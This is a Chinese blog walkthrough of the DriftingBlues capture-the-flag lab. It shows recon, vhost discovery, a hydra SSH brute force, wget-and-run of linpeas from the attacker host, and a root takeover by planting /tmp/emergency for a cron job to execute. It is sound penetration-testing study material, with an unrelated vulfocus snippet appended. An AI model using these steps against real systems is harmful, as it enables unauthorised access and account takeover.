【靶场系列】driftingblues

信息收集

nmap发现主机

nmap -sV -A -p- 192.168.56.0/24

Nmap scan report for 192.168.56.136
Host is up (0.00081s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ca:e6:d1:1f:27:f2:62:98:ef:bf:e4:38:b5:f1:67:77 (RSA)
|   256 a8:58:99:99:f6:81:c4:c2:b4:da:44:da:9b:f3:b8:9b (ECDSA)
|_  256 39:5b:55:2a:79:ed:c3:bf:f5:16:fd:bd:61:29:2a:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Drifting Blues Tech
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录爆破,什么也没扫到

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.136 -x php,txt,zip,rar

/img                  (Status: 301) [Size: 314] [--> http://192.168.56.136/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.136/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.136/js/]
/server-status        (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)

查看首页源代码,在最下方发现一段base64编码
image.png
解码得到一个文件名

┌──(kali㉿kali)-[/var/www/html]
└─$ echo L25vdGVmb3JraW5nZmlzaC50eHQ= | base64 -d              
/noteforkingfish.txt 

ook编码
image.png

使用在线网站解码
URL:https://tool.bugku.com/brainfuck/
image.png

猜测需要域名访问,首先要知道靶机的域名
主页中发现一个域名
image.png

使用root用户写入hosts文件

┌──(root㉿kali)-[/home/kali/Desktop]
└─# echo "192.168.56.136 driftingblues.box" >> /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat /etc/hosts      
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

192.168.56.136 driftingblues.box

不知道为什么我爆破不出来域名,所以就跳过这一步直接得到test.driftingblues.box了

┌──(root㉿kali)-[/home/kali]
└─# curl -H "Host: test.driftingblues.box" http://driftingblues.box
work
in
progress

-eric

将test.driftingblues.box写入hosts文件

┌──(root㉿kali)-[/home/kali]
└─# echo "192.168.56.136 test.driftingblues.box" >> /etc/hosts

扫目录

┌──(kali㉿kali)-[~]
└─$ dirb http://test.driftingblues.box

-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Thu Apr 18 07:27:42 2024
URL_BASE: http://test.driftingblues.box/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                         

---- Scanning URL: http://test.driftingblues.box/ ----
+ http://test.driftingblues.box/index.html (CODE:200|SIZE:24)                
+ http://test.driftingblues.box/robots.txt (CODE:200|SIZE:125)                
+ http://test.driftingblues.box/server-status (CODE:403|SIZE:287)                                
-----------------

访问robots.txt
image.png
访问ssh_cred.txt
image.png

获取shell

制作字典准备爆破

┌──(kali㉿kali)-[~/Desktop]
└─$ cat passwd.txt 
1mw4ckyyucky1
1mw4ckyyucky2
1mw4ckyyucky3
1mw4ckyyucky4
1mw4ckyyucky5
1mw4ckyyucky6
1mw4ckyyucky7
1mw4ckyyucky8
1mw4ckyyucky9
1mw4ckyyucky0

尝试爆破在主页发现的一个用户eric,成功

┌──(kali㉿kali)-[~]
└─$ hydra 192.168.56.136 -l eric -P ~/Desktop/passwd.txt ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-18 07:34:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:1/p:10), ~1 try per task
[DATA] attacking ssh://192.168.56.136:22/
[22][ssh] host: 192.168.56.136   login: eric   password: 1mw4ckyyucky6
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-18 07:34:06

成功登录
image.png

权限提升

下载linpeas.sh脚本

wget 192.168.56.129/1.sh
chmod +x 1.sh
./1.sh

scp上传pspy64,监测定时任务

scp /home/kali/Desktop/pspy64  eric@192.168.56.136:/home/eric/

image.png
发现会定期执行备份脚本
查看该脚本

eric@driftingblues:~$ cat /var/backups/backup.sh
#!/bin/bash

/usr/bin/zip -r -0 /tmp/backup.zip /var/www/
/bin/chmod

#having a backdoor would be nice
sudo /tmp/emergency

该脚本会用root权限执行/tmp/emergency程序,但该系统里并没有该程序
编辑/tmp/emergency实现更改root密码,并赋予执行权限

eric@driftingblues:~$ cat /tmp/emergency 
#!/bin/bash
echo -e "123456\n123456" | passwd root

eric@driftingblues:~$ chmod +x /tmp/emergency

等待定时任务执行,可以看到任务执行成功了
image.png
登录root用户
image.png

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上,它提供了场景编排功能,可以用于内网突破训练和多重内网的穿透等用途。如果你想在本地搭建vulfocus靶场,可以按照以下步骤进行操作: 1. 创建一个目录并进入该目录,例如:mkdir VF靶场 && cd VF靶场。 2. 使用git命令克隆vulfocus仓库:git clone https://github.com/fofapro/vulfocus.git web。 3. 配置环境参数,将你的CentOS服务器的IP地址填入配置文件中。你可以使用ifconfig命令查看你的IP地址。 这样,你就可以搭建vulfocus靶场并开始使用了。 #### 引用[.reference_title] - *1* *2* [【靶场】vulfocus搭建和场景编排](https://blog.csdn.net/qq_39583774/article/details/130917089)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [vulfocus靶场的搭建](https://blog.csdn.net/qq_68890680/article/details/131351918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值